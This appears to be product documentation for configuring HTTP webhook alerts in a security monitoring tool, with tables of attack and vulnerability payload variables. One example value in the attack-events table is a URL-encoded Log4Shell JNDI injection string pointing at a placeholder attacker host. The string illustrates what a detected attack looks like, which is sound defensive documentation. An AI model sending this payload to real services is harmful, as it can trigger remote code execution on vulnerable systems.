Create an HTTP Alert

The Alerts tab allows you to configure email and HTTP based alerts. You can set up actions to get alerted when Secure Application detects new attacks, vulnerabilities, or business risks.

Note: Only users with Edit (admin or tenant level) permission can access Alerts. An RBAC user with less privileges than admin or tenant level cannot create alerts.
  1. From the Secure Application dashboard, navigate to Alerts.
  2. From the HTTP tab, click + Add Action.
  3. Enter the Action Name.
    Do not use special characters in the Action Name.
  4. Select the Event Type: Vulnerability, Business Risk, or Attack.
  5. Click Next.
  6. Enter following Action Details:
    1. Method Type: POST
    2. Encoding: UTF-8
    3. (Optional) Applications: Select up to 100 applications that this action applies to from the pull-down list. You can filter the list by typing into it. By default, this action applies to all applications.
    4. Raw URL: Enter the Raw URL of your HTTP request.
  7. Click Next.
  8. For Authentication Type select:
    1. None, if the communication is not encrypted
    2. Basic, and enter your username and password
    3. Bearer Token, and enter your token
  9. Click Next.
  10. (Optional) Specify custom headers for the request.
  11. Click Next.
  12. Click Add Payload.

    The payload must be valid JSON. You can copy Predefined Variables, and paste the variables in the Editor. For example, if you select Attack as the Event Type, then you can select variable related to attack events when you click Add Payload.

    Attack variables:

    FieldDescriptionExample value
    $attack.idUnique identifier for the attack"SQL_INJECTION_001"
    $attack.statusCurrent status of the attack"ACTIVE", "RESOLVED", "INVESTIGATING"
    $attack.sourceSource or origin of the attack"External", "Internal", "Unknown"
    $attack.outcomeResult or outcome of the attack"BLOCKED", "ALLOWED", "PARTIALLY_BLOCKED"
    $attack.typesType(s) of attack detected"SQL Injection", "XSS", "CSRF"
    $attack.eventTriggerEvent that triggered the attack detection"HTTP Request", "Database Query"
    $attack.lastDetectedTimestamp when the attack was last detected"2023-10-15T14:30:00Z"
    $attack.eventsDetailed events associated with the attack. See the Attack Events table below for details.JSON array of attack events

    $attack.events contains the following key fields:

    FieldDescriptionExample value
    $attack.events.eventTypeType of activity detected during the attack"SOCKET_RESOLVE"
    $attack.events.attackTypeSpecific attack category detected"LOG4J"
    $attack.events.timestampWhen the attack event occurred"2025-01-22T23:03:52Z"
    $attack.events.applicationNameApplication which was affected by the attack"ExpoitsTestApp"
    $attack.events.tierNameTier which was affected by the attack"ExpoitsTestTier"
    $attack.events.blockedIndicates if the attack was blocked"true", "false"
    $attack.events.attackOutcomeOutcome of the event"EXPLOITED", "ATTEMPTED", "BLOCKED", "OBSERVED", "UNKNOWN"
    $attack.events.stackTraceStack trace where the attack originated"java.lang.SecurityManager.checkConnect(...)"
    $attack.events.clientAddressIP address of the client initiating the request"127.11.11.1"
    $attack.events.clientPortPort used by the client"40758"
    $attack.events.serverAddressIP address of the server handling the request"127.12.12.1"
    $attack.events.serverPortPort used by the server"8088"
    $attack.events.webTransactionUrlFull URL involved in the exploit attempt"https://vulnerable.app.com/login?user=%24%7Bjndi%3Aldap%3A%2F%2Fmalicious.attacker.com%2Fa%7D"
    $attack.events.maliciousIpOutOutbound IP address contacted during the event"192.0.2.123"
    $attack.events.maliciousIpSourceOutSource of malicious IP match, if any"10.1.2.45"
    $attack.events.detailJsonStructured technical metadata (e.g., class, socket, method){"classname": "java.net.SocketPermission", ...}

    If the attack event is caused by a vulnerability, $attack.events may contain the following additional fields:

    Table 1. Vulnerability-Related Attack Event Fields
    FieldDescriptionExample value
    $attack.events.vulnerableMethodMethod where the vulnerability was triggered"org.apache.logging.log4j.core.lookup.JndiLookup.lookup(Thread.java:234)"
    $attack.events.matchedCveNameName of the matched CVE"CVE-2021-44228"
    $attack.events.cveIdInternal identifier for the matched CVE
    $attack.events.vulnerabilityInfo.cvePublishDateCVE publish date"2021-12-10T10:10:01Z"
    $attack.events.vulnerabilityInfo.cvssScoreCVSS risk score (0–10)10
    $attack.events.vulnerabilityInfo.cvssSeveritySeverity level according to CVSS"CRITICAL"
    $attack.events.vulnerabilityInfo.libraryVulnerable library involved"org.apache.logging.log4j:log4j-core"
    $attack.events.vulnerabilityInfo.titleHuman-readable description of the vulnerability"Remote Code Execution (RCE)"
    $attack.events.vulnerabilityInfo.kennaScoreRisk score from Kenna Security100
    $attack.events.vulnerabilityInfo.kennaActiveInternetBreachWhether the vuln is known to be actively exploitedtrue, false
    $attack.events.vulnerabilityInfo.kennaEasilyExploitableWhether the vuln is easy to exploittrue, false
    $attack.events.vulnerabilityInfo.kennaPredictedExploitablePredictive model’s assessment of exploitabilitytrue, false
    $attack.events.vulnerabilityInfo.kennaPopularTargetWhether this is a popular target across orgstrue, false
    Tip:

    Select the predefined variable $attack.events to include details related to any vulnerability associated with the attack in the payload.

    Select the predefined variable $attack.events to include up to 256 lines of the stack trace in the payload.

  13. Confirm and review the following information: cURL,General Information,Actions,Security,Custom Headers, and Payload.
    Sample payload for ServiceNow:
  14. Click Save.
Once you click Save, default Rules are automatically generated. To see the rules, click the Rule tab. If you specified which applications this action applies to, those applications are listed on the Rules tab in the Application column.